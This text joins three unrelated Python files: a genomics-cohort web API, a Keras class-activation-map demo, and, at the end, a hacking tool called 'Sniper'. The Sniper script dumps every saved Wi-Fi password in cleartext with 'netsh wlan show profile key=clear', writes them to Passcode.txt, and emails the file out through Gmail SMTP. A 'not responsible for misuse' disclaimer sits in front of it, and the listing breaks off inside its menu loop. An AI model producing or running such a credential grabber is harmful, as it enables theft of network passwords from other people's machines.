patient_cursor.close()
biospecimen_cursor.close()
db.close()
error_message = "Sample barcode {} not found in metadata_biospecimen table.".format(sample_barcode)
return SampleDetails(biospecimen_data=None, aliquots=[], patient=None, data_details=[],
data_details_count=None, error=error_message)
patient_barcode = str(row["ParticipantBarcode"])
data_cursor = db.cursor(MySQLdb.cursors.DictCursor)
data_cursor.execute(data_query_str, extra_query_tuple)
data_data = []
bad_repo_count = 0
bad_repo_set = set()
for row in data_cursor.fetchall():
if not row.get('DataFileNameKey'):
continue
if 'controlled' not in str(row['SecurityProtocol']).lower():
cloud_storage_path = "gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey'))
else: # not filtering on dbGaP_authorized:
if row['Repository'].lower() == 'dcc':
bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET
elif row['Repository'].lower() == 'cghub':
bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET
else: # shouldn't ever happen
bad_repo_count += 1
bad_repo_set.add(row['Repository'])
continue
cloud_storage_path = "gs://{}{}".format(bucket_name, row.get('DataFileNameKey'))
data_item = DataDetails(
SampleBarcode=str(row['SampleBarcode']),
DataCenterName=str(row['DataCenterName']),
DataCenterType=str(row['DataCenterType']),
DataFileName=str(row['DataFileName']),
DataFileNameKey=str(row.get('DataFileNameKey')),
DatafileUploaded=str(row['DatafileUploaded']),
DataLevel=str(row['DataLevel']),
Datatype=str(row['Datatype']),
GenomeReference=str(row['GenomeReference']),
GG_dataset_id=str(row['GG_dataset_id']),
GG_readgroupset_id=str(row['GG_readgroupset_id']),
Pipeline=str(row['Pipeline']),
Platform=str(row['Platform']),
platform_full_name=str(row['platform_full_name']),
Project=str(row['Project']),
Repository=str(row['Repository']),
SDRFFileName=str(row['SDRFFileName']),
SecurityProtocol=str(row['SecurityProtocol']),
CloudStoragePath=cloud_storage_path
)
data_data.append(data_item)
if bad_repo_count > 0:
logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}"
.format(count=bad_repo_count, bad_repo_list=list(bad_repo_set)))
return SampleDetails(biospecimen_data=item, aliquots=aliquot_data,
patient=patient_barcode, data_details=data_data,
data_details_count=len(data_data))
except (IndexError, TypeError) as e:
logger.info("Sample details for barcode {} not found. Error: {}".format(sample_barcode, e))
raise endpoints.NotFoundException(
"Sample details for barcode {} not found.".format(sample_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tbiospecimen query: {} {}\n\tpatient query: {} {}\n\tdata query: {} {}'\
.format(e, biospecimen_query_str, query_tuple, patient_query_str, query_tuple,
data_query_str, extra_query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving biospecimen, patient, or other data. {}".format(msg))
finally:
if biospecimen_cursor: biospecimen_cursor.close()
if aliquot_cursor: aliquot_cursor.close()
if patient_cursor: patient_cursor.close()
if data_cursor: data_cursor.close()
if db and db.open: db.close()
GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
limit=messages.IntegerField(2),
platform=messages.StringField(3),
pipeline=messages.StringField(4),
token=messages.StringField(5))
@endpoints.method(GET_RESOURCE, DataFileNameKeyList,
path='datafilenamekey_list_from_cohort', http_method='GET',
name='cohorts.datafilenamekey_list_from_cohort')
def datafilenamekey_list_from_cohort(self, request):
"""
Takes a cohort id as a required parameter and returns cloud storage paths to files
associated with all the samples in that cohort, up to a default limit of 10,000 files.
Authentication is required. User must have READER or OWNER permissions on the cohort.
"""
user_email = None
cursor = None
db = None
limit = request.get_assigned_value('limit')
platform = request.get_assigned_value('platform')
pipeline = request.get_assigned_value('pipeline')
cohort_id = request.get_assigned_value('cohort_id')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
if user_email:
django.setup()
query_str = 'SELECT DataFileNameKey, SecurityProtocol, Repository ' \
'FROM metadata_data '
try:
user_id = Django_User.objects.get(email=user_email).id
django_cohort = Django_Cohort.objects.get(id=cohort_id)
cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id)
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
err_msg = "Error retrieving cohort {} for user {}: {}".format(cohort_id, user_email, e)
if 'Cohort_Perms' in e.message:
err_msg = "User {} does not have permissions on cohort {}. Error: {}"\
.format(user_email, cohort_id, e)
request_finished.send(self)
raise endpoints.UnauthorizedException(err_msg)
query_str += 'JOIN cohorts_samples ON metadata_data.SampleBarcode=cohorts_samples.sample_id ' \
'WHERE cohorts_samples.cohort_id=%s ' \
'AND DataFileNameKey != "" AND DataFileNameKey is not null '
query_tuple = (cohort_id,)
if platform:
query_str += ' and metadata_data.Platform=%s '
query_tuple += (platform,)
if pipeline:
query_str += ' and metadata_data.Pipeline=%s '
query_tuple += (pipeline,)
query_str += ' GROUP BY DataFileNameKey, SecurityProtocol, Repository '
if limit is None:
query_str += ' LIMIT 10000'
else:
query_str += ' LIMIT %s'
query_tuple += (limit,)
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
datafilenamekeys = []
bad_repo_count = 0
bad_repo_set = set()
for row in cursor.fetchall():
if not row.get('DataFileNameKey'):
continue
if 'controlled' not in str(row['SecurityProtocol']).lower():
datafilenamekeys.append("gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey')))
else: # not filtering on dbGaP_authorized
bucket_name = ''
if row['Repository'].lower() == 'dcc':
bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET
elif row['Repository'].lower() == 'cghub':
bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET
else: # shouldn't ever happen
bad_repo_count += 1
bad_repo_set.add(row['Repository'])
continue
datafilenamekeys.append("gs://{}{}".format(bucket_name, row.get('DataFileNameKey')))
if bad_repo_count > 0:
logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}"
.format(count=bad_repo_count, bad_repo_list=list(bad_repo_set)))
return DataFileNameKeyList(datafilenamekeys=datafilenamekeys, count=len(datafilenamekeys))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("File paths for cohort {} not found.".format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\t query: {} {}'.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving file paths. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True),
platform=messages.StringField(2),
pipeline=messages.StringField(3))
@endpoints.method(GET_RESOURCE, DataFileNameKeyList,
path='datafilenamekey_list_from_sample', http_method='GET', name='cohorts.datafilenamekey_list_from_sample')
def datafilenamekey_list_from_sample(self, request):
"""
Takes a sample barcode as a required parameter and
returns cloud storage paths to files associated with that sample.
"""
cursor = None
db = None
sample_barcode = request.get_assigned_value('sample_barcode')
platform = request.get_assigned_value('platform')
pipeline = request.get_assigned_value('pipeline')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
query_str = 'SELECT DataFileNameKey, SecurityProtocol, Repository ' \
'FROM metadata_data WHERE SampleBarcode=%s '
query_tuple = (sample_barcode,)
if platform:
query_str += ' and Platform=%s '
query_tuple += (platform,)
if pipeline:
query_str += ' and Pipeline=%s '
query_tuple += (pipeline,)
query_str += ' GROUP BY DataFileNameKey, SecurityProtocol, Repository'
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
datafilenamekeys = []
bad_repo_count = 0
bad_repo_set = set()
for row in cursor.fetchall():
if not row.get('DataFileNameKey'):
continue
if 'controlled' not in str(row['SecurityProtocol']).lower():
datafilenamekeys.append("gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey')))
else: # not filtering on dbGaP_authorized
bucket_name = ''
if row['Repository'].lower() == 'dcc':
bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET
elif row['Repository'].lower() == 'cghub':
bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET
else: # shouldn't ever happen
bad_repo_count += 0
bad_repo_set.add(row['Repository'])
continue
datafilenamekeys.append("gs://{}{}".format(bucket_name, row.get('DataFileNameKey')))
if bad_repo_count > 0:
logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}"
.format(count=bad_repo_count, bad_repo_list=list(bad_repo_set)))
return DataFileNameKeyList(datafilenamekeys=datafilenamekeys, count=len(datafilenamekeys))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("File paths for sample {} not found.".format(sample_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\t query: {} {}'.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving file paths. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
POST_RESOURCE = endpoints.ResourceContainer(IncomingMetadataItem,
name=messages.StringField(2, required=True),
token=messages.StringField(3)
)
@endpoints.method(POST_RESOURCE, Cohort,
path='save_cohort', http_method='POST', name='cohorts.save')
def save_cohort(self, request):
"""
Creates and saves a cohort. Takes a JSON object in the request body to use as the cohort's filters.
Authentication is required.
Returns information about the saved cohort, including the number of patients and the number
of samples in that cohort.
"""
user_email = None
patient_cursor = None
sample_cursor = None
db = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
if user_email:
django.setup()
try:
django_user = Django_User.objects.get(email=user_email)
user_id = django_user.id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
request_finished.send(self)
raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email)
query_dict = {
k.name: request.get_assigned_value(k.name)
for k in request.all_fields()
if request.get_assigned_value(k.name)
and k.name is not 'name' and k.name is not 'token'
}
if are_there_bad_keys(request) or are_there_no_acceptable_keys(request):
err_msg = construct_parameter_error_message(request, True)
request_finished.send(self)
raise endpoints.BadRequestException(err_msg)
patient_query_str = 'SELECT DISTINCT(IF(ParticipantBarcode="", LEFT(SampleBarcode,12), ParticipantBarcode)) ' \
'AS ParticipantBarcode ' \
'FROM metadata_samples '
sample_query_str = 'SELECT SampleBarcode ' \
'FROM metadata_samples '
value_tuple = ()
if len(query_dict) > 0:
where_clause = build_where_clause(query_dict)
patient_query_str += ' WHERE ' + where_clause['query_str']
sample_query_str += ' WHERE ' + where_clause['query_str']
value_tuple = where_clause['value_tuple']
sample_query_str += ' GROUP BY SampleBarcode'
patient_barcodes = []
sample_barcodes = []
try:
db = sql_connection()
patient_cursor = db.cursor(MySQLdb.cursors.DictCursor)
patient_cursor.execute(patient_query_str, value_tuple)
for row in patient_cursor.fetchall():
patient_barcodes.append(row['ParticipantBarcode'])
sample_cursor = db.cursor(MySQLdb.cursors.DictCursor)
sample_cursor.execute(sample_query_str, value_tuple)
for row in sample_cursor.fetchall():
sample_barcodes.append(row['SampleBarcode'])
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("Error retrieving samples or patients")
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\
.format(e, patient_query_str, value_tuple, sample_query_str, value_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error saving cohort. {}".format(msg))
finally:
if patient_cursor: patient_cursor.close()
if sample_cursor: sample_cursor.close()
if db and db.open: db.close()
request_finished.send(self)
cohort_name = request.get_assigned_value('name')
# 1. create new cohorts_cohort with name, active=True, last_date_saved=now
created_cohort = Django_Cohort.objects.create(name=cohort_name, active=True, last_date_saved=datetime.utcnow())
created_cohort.save()
# 2. insert patients into cohort_patients
patient_barcodes = list(set(patient_barcodes))
patient_list = [Patients(cohort=created_cohort, patient_id=patient_code) for patient_code in patient_barcodes]
Patients.objects.bulk_create(patient_list)
# 3. insert samples into cohort_samples
sample_barcodes = list(set(sample_barcodes))
sample_list = [Samples(cohort=created_cohort, sample_id=sample_code) for sample_code in sample_barcodes]
Samples.objects.bulk_create(sample_list)
# 4. Set permission for user to be owner
perm = Cohort_Perms(cohort=created_cohort, user=django_user, perm=Cohort_Perms.OWNER)
perm.save()
# 5. Create filters applied
for key, val in query_dict.items():
Filters.objects.create(resulting_cohort=created_cohort, name=key, value=val).save()
# 6. Store cohort to BigQuery
project_id = settings.BQ_PROJECT_ID
cohort_settings = settings.GET_BQ_COHORT_SETTINGS()
bcs = BigQueryCohortSupport(project_id, cohort_settings.dataset_id, cohort_settings.table_id)
bcs.add_cohort_with_sample_barcodes(created_cohort.id, sample_barcodes)
request_finished.send(self)
return Cohort(id=str(created_cohort.id),
name=cohort_name,
last_date_saved=str(datetime.utcnow()),
num_patients=str(len(patient_barcodes)),
num_samples=str(len(sample_barcodes))
)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
DELETE_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
token=messages.StringField(2)
)
@endpoints.method(DELETE_RESOURCE, ReturnJSON,
path='delete_cohort', http_method='POST', name='cohorts.delete')
def delete_cohort(self, request):
"""
Deletes a cohort. User must have owner permissions on the cohort.
"""
user_email = None
return_message = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
cohort_id = request.get_assigned_value('cohort_id')
if user_email:
django.setup()
try:
django_user = Django_User.objects.get(email=user_email)
user_id = django_user.id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
request_finished.send(self)
raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email)
try:
cohort_to_deactivate = Django_Cohort.objects.get(id=cohort_id)
if cohort_to_deactivate.active is True:
cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id)
if cohort_perm.perm == 'OWNER':
cohort_to_deactivate.active = False
cohort_to_deactivate.save()
return_message = 'Cohort %d successfully deactivated.' % cohort_id
else:
return_message = 'You do not have owner permission on cohort %d.' % cohort_id
else:
return_message = "Cohort %d was already deactivated." % cohort_id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
raise endpoints.NotFoundException(
"Either cohort %d does not have an entry in the database "
"or you do not have owner or reader permissions on this cohort." % cohort_id)
finally:
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Unsuccessful authentication.")
return ReturnJSON(msg=return_message)
POST_RESOURCE = endpoints.ResourceContainer(IncomingMetadataItem)
@endpoints.method(POST_RESOURCE, CohortPatientsSamplesList,
path='preview_cohort', http_method='POST', name='cohorts.preview')
def preview_cohort(self, request):
"""
Takes a JSON object of filters in the request body and returns a "preview" of the cohort that would
result from passing a similar request to the cohort **save** endpoint. This preview consists of
two lists: the lists of participant (aka patient) barcodes, and the list of sample barcodes.
Authentication is not required.
"""
# print >> sys.stderr,'Called '+sys._getframe().f_code.co_name
patient_cursor = None
sample_cursor = None
db = None
query_dict = {
k.name: request.get_assigned_value(k.name)
for k in request.all_fields()
if request.get_assigned_value(k.name)
}
if are_there_bad_keys(request) or are_there_no_acceptable_keys(request):
err_msg = construct_parameter_error_message(request, True)
raise endpoints.BadRequestException(err_msg)
patient_query_str = 'SELECT DISTINCT(IF(ParticipantBarcode="", LEFT(SampleBarcode,12), ParticipantBarcode)) ' \
'AS ParticipantBarcode ' \
'FROM metadata_samples '
sample_query_str = 'SELECT SampleBarcode ' \
'FROM metadata_samples '
value_tuple = ()
if len(query_dict) > 0:
where_clause = build_where_clause(query_dict)
patient_query_str += ' WHERE ' + where_clause['query_str']
sample_query_str += ' WHERE ' + where_clause['query_str']
value_tuple = where_clause['value_tuple']
sample_query_str += ' GROUP BY SampleBarcode'
patient_barcodes = []
sample_barcodes = []
try:
db = sql_connection()
patient_cursor = db.cursor(MySQLdb.cursors.DictCursor)
patient_cursor.execute(patient_query_str, value_tuple)
for row in patient_cursor.fetchall():
patient_barcodes.append(row['ParticipantBarcode'])
sample_cursor = db.cursor(MySQLdb.cursors.DictCursor)
sample_cursor.execute(sample_query_str, value_tuple)
for row in sample_cursor.fetchall():
sample_barcodes.append(row['SampleBarcode'])
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("Error retrieving samples or patients: {}".format(e))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\
.format(e, patient_query_str, value_tuple, sample_query_str, value_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error previewing cohort. {}".format(msg))
finally:
if patient_cursor: patient_cursor.close()
if sample_cursor: sample_cursor.close()
if db and db.open: db.close()
return CohortPatientsSamplesList(patients=patient_barcodes,
patient_count=len(patient_barcodes),
samples=sample_barcodes,
sample_count=len(sample_barcodes))
GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
token=messages.StringField(2))
@endpoints.method(GET_RESOURCE, GoogleGenomicsList,
path='google_genomics_from_cohort', http_method='GET', name='cohorts.google_genomics_from_cohort')
def google_genomics_from_cohort(self, request):
"""
Returns a list of Google Genomics dataset and readgroupset ids associated with
all the samples in a specified cohort.
Authentication is required. User must have either READER or OWNER permissions on the cohort.
"""
cursor = None
db = None
user_email = None
cohort_id = request.get_assigned_value('cohort_id')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
if user_email:
django.setup()
try:
user_id = Django_User.objects.get(email=user_email).id
django_cohort = Django_Cohort.objects.get(id=cohort_id)
cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id)
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
err_msg = "Error retrieving cohort {} for user {}: {}".format(cohort_id, user_email, e)
if 'Cohort_Perms' in e.message:
err_msg = "User {} does not have permissions on cohort {}. Error: {}"\
.format(user_email, cohort_id, e)
request_finished.send(self)
raise endpoints.UnauthorizedException(err_msg)
query_str = 'SELECT SampleBarcode, GG_dataset_id, GG_readgroupset_id ' \
'FROM metadata_data ' \
'JOIN cohorts_samples ON metadata_data.SampleBarcode=cohorts_samples.sample_id ' \
'WHERE cohorts_samples.cohort_id=%s ' \
'AND GG_dataset_id !="" AND GG_readgroupset_id !="" ' \
'GROUP BY SampleBarcode, GG_dataset_id, GG_readgroupset_id;'
query_tuple = (cohort_id,)
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
google_genomics_items = []
for row in cursor.fetchall():
google_genomics_items.append(
GoogleGenomicsItem(
SampleBarcode=row['SampleBarcode'],
GG_dataset_id=row['GG_dataset_id'],
GG_readgroupset_id=row['GG_readgroupset_id']
)
)
return GoogleGenomicsList(items=google_genomics_items, count=len(google_genomics_items))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException(
"Google Genomics dataset and readgroupset id's for cohort {} not found."
.format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tquery: {} {}'\
.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving genomics data for cohort. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True))
@endpoints.method(GET_RESOURCE, GoogleGenomicsList,
path='google_genomics_from_sample', http_method='GET', name='cohorts.google_genomics_from_sample')
def google_genomics_from_sample(self, request):
"""
Takes a sample barcode as a required parameter and returns the Google Genomics dataset id
and readgroupset id associated with the sample, if any.
"""
# print >> sys.stderr,'Called '+sys._getframe().f_code.co_name
cursor = None
db = None
sample_barcode = request.get_assigned_value('sample_barcode')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
query_str = 'SELECT SampleBarcode, GG_dataset_id, GG_readgroupset_id ' \
'FROM metadata_data ' \
'WHERE SampleBarcode=%s ' \
'AND GG_dataset_id !="" AND GG_readgroupset_id !="" ' \
'GROUP BY SampleBarcode, GG_dataset_id, GG_readgroupset_id;'
query_tuple = (sample_barcode,)
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
google_genomics_items = []
for row in cursor.fetchall():
google_genomics_items.append(
GoogleGenomicsItem(
SampleBarcode=row['SampleBarcode'],
GG_dataset_id=row['GG_dataset_id'],
GG_readgroupset_id=row['GG_readgroupset_id']
)
)
return GoogleGenomicsList(items=google_genomics_items, count=len(google_genomics_items))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException(
"Google Genomics dataset and readgroupset id's for sample {} not found."
.format(sample_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tquery: {} {}'\
.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving genomics data for sample. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
|
# -*- coding: utf-8 -*-
import keras
import numpy as np
import cv2
import matplotlib.pyplot as plt
from keras.models import Model
from keras.layers import Conv2D
from keras_applications import efficientnet
default_setting = {"backend": keras.backend, "layers": keras.layers,
"models": keras.models, "utils": keras.utils}
def load_img(fname, input_size, preprocess_fn):
original_img = cv2.imread(fname)[:, :, ::-1]
original_size = (original_img.shape[1], original_img.shape[0])
img = cv2.resize(original_img, (input_size, input_size))
imgs = np.expand_dims(preprocess_fn(img), axis=0)
return imgs, original_img, original_size
def postprocess(preds, cams, top_k=1):
# idxes = np.argsort(preds[0])[-top_k:]
idxes = np.argsort(preds[0])[:top_k]
class_activation_map = np.zeros_like(cams[0, :, :, 0])
for i in idxes:
class_activation_map += cams[0, :, :, i]
class_activation_map[class_activation_map < 0] = 0
class_activation_map = class_activation_map / class_activation_map.max()
return class_activation_map
if __name__ == '__main__':
model = efficientnet.EfficientNetB4(**default_setting)
# model.summary()
input_size = model.layers[0].output_shape[1]
print(input_size)
LAST_CONV_LAYER = 'top_activation'
PRED_LAYER = 'probs'
N_CLASSES = 1000
input_image = "imgs/img2.jpg"
original_img = cv2.imread(input_image)[:, :, ::-1]
original_size = (original_img.shape[1], original_img.shape[0])
img = cv2.resize(original_img, (input_size, input_size))
img = efficientnet.preprocess_input(img, **default_setting)
imgs = np.expand_dims(img, axis=0)
print(imgs.shape)
final_params = model.get_layer(PRED_LAYER).get_weights()
final_params = (final_params[0].reshape(
1, 1, -1, N_CLASSES), final_params[1])
last_conv_output = model.get_layer(LAST_CONV_LAYER).output
x = last_conv_output
x = Conv2D(filters=N_CLASSES, kernel_size=(
1, 1), name='predictions_2')(x)
cam_model = Model(inputs=model.input,
outputs=[model.output, x])
cam_model.get_layer('predictions_2').set_weights(final_params)
preds, cams = cam_model.predict(imgs)
print(preds.shape, cams.shape)
# # 4. post processing
class_activation_map = postprocess(preds, cams, top_k=10)
# 5. plot image+cam to original size
plt.imshow(original_img, alpha=0.5)
plt.imshow(cv2.resize(class_activation_map,
original_size), cmap='jet', alpha=0.5)
plt.show()
|
import subprocess
import os
import sys
import logging
import time
import email, smtplib, ssl
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
def clear():
os.system('cls')
def begin():
print("Let's Start")
def warn():
clear()
sys.stdout.write(MAGENTA+ '''
_.--""--._
/ _ _ \\
_ ( (_\\ /_) ) _
{ \\._\\ /\\ /_./ }
/_"=-.}______{.-="_\\
_ _.=("""")=._ _
(_'"_.-"***"-._"'_)
{_" " _}
''' + RED + ''' [ Disclaimer Alert ]''' + YELLOW + '''
''' + WHITE + ''' I'm Not Responsible For Misuse ''' + YELLOW + '''
''' + WHITE + ''' or Illegal Purposes.''' + YELLOW + '''
''' + WHITE + ''' Use it just for''' + RED + ''' WORK''' + WHITE + ''' or ''' + RED + '''EDUCATIONAL''' + WHITE + ''' !
''')
def heading():
clear()
sys.stdout.write(RED + '''
`` `` `` ``` `` ` _```..```````'''+RED+'''.hh/ ``` `````.----:::--::- `` `` `` `` ``` `` ```
``` ``` `` `` ``` 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>`` ``` ``` ``` `` `` ``` `
`` `` `` ``` `` `Lxxxxxxx+xxxxxxx++ooo/+oooooooooooooooy> `` `` `` ``` ``` ``` ``` '''+YELLOW+'''
``` `.::-------.. ``` -``` -/mmmmmmmmmmmmmm+++oooosoooooooooooo'''+WHITE+'''///////++++++++++++++++++++++//// `'''+YELLOW+'''
`` `Nmmmmmmmmmmmmmmm//` `` `-:/mmmmmmmmmmmmmmmmmmmmmmmmmm'''+WHITE+'''ooooooooooooooooo//::://::::::::::::::::::-`'''+YELLOW+'''
`` .Nmmmmmmmmmmmmmmmmmm ``+Nmmmmmmmmmmmmmmmmooooooooo/'''+WHITE+''':::::----::----:..``` `` `` ``` `` ``` '''+YELLOW+'''
`-Nmmmmmmmmmmmmmmmmmm/:/xxxxx-`/xx`-xxxxxxxx'''+MAGENTA+''' ``` ``` `` `` `` ``` ``` ``` `` `` ``` `
`` -Nmmmmmmmmmmmmmmmmmmmmmmm``````.-``..` `` `` `` ``` ``` `` `` `` `` ``` `` ```
`:Nmmmmmmmmmmmmmmmmmmmmmm;` `` `` `` ``` ``` `` `` `` ``` ``` ``` `` `` ``` `
`` .Nmmmmmmmmmmmmmmmmmmmmm; `` `` ``` `` `` `` ``` `` `` `` `` `` ``` `` ```
by:''' + WHITE + ' MrAnonymousOfficial (' + YELLOW + '@mr.anonymous_official' + WHITE + ')\n\t\t\t'
'Instagram (' + YELLOW + 'instagram.com/mr.anonymous_official' +WHITE+ ')\n\t\t\t'
'Twitter (' + YELLOW + 'twitter.com/MrAnonymousOfcl' +WHITE+ ')' + '\n''' + END)
print ('\n\t\t {0}[{1}M{0}]{1} Send Passcodes to E-Mail {0}[{1}G{0}]{1} Grab Wi-Fi Password\n\t\t {0}[{1}H{0}]{1} Help\t\t\t{0}[{1}Q{0}]{1} Quit '.format(YELLOW, WHITE) + '\n')
def mailsender():
clear()
subject = "Sniper- Grabbed Wi-Fi Passwords"
body = "This is an email sent from Sniper. Find your grabbed Wi-Fi Passwords in the below attached file. Goodbye. "
sender_email = input("Enter Your E-Mail ID")
password = input("Enter Your Password")
receiver_email = input("Enter the E-mail ID of the Reciever")
print ('\n')
print ('[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
print ('\n email: ' + sender_email)
print (' password: ' + password)
print (' recieve in:' + receiver_email)
print ('\n[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
print ('\n')
ask = input('These info above are correct? (y/n) :')
if ask == 'y':
pass
else:
mailsender()
message = MIMEMultipart()
message["From"] = sender_email
message["To"] = receiver_email
message["Subject"] = subject
message["Bcc"] = receiver_email
message.attach(MIMEText(body, "plain"))
filename = "Passcode.txt"
with open(filename, "rb") as attachment:
part = MIMEBase("application", "octet-stream")
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header(
"Content-Disposition",
f"attachment; filename= {filename}",
)
message.attach(part)
text = message.as_string()
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, text)
def passwords():
clear()
logging.basicConfig(filename="Passcode.txt", level=logging.DEBUG, format="%(message)s")
data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
for i in profiles:
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
print(f"{i}:----->{results}")
logging.info(str(f"{i}------>{results}"))
def main():
clear()
warn()
x = input('Do You Agree? (Y/N)')
if x.upper() == 'Y':
pass
else:
print("Goodbye.....see you next time")
sys.exit(0)
begin()
heading()
input('Press ENTER Key to Continue')
while True:
header = ('{0}SNIPER{1} > {2}'.format(YELLOW, WHITE, END))
choice = input(header)
print("You select "+ choice)
if choice.upper() == "Q" or choice.upper() == 'QUIT':
clear()
print("Good bye.......See you Later")
raise SystemExit
elif choice.upper() == 'G' or choice.upper() == 'GRAB':
clear()
print("Please wait.......Grabbing passwords")
if(os.path.isfile('Passcode.txt')):
print("Already File Exists: Do You like to add these details in this file?\n")
x = input("(Y/n)")
if x.upper() == 'Y':
passwords()
print("Succesfully Merged The Details in the file\n")
else:
print("Operation Cancelled\n")
else:
passwords()
print("\n\n\t\t\tYour Requested Wi-Fi Passwords is saved as\n\t\t\t 'Passcode.txt'\n\t\t\tin the same Directory")
elif choice.upper() == 'M' or choice.upper() == 'MAIL':
clear()
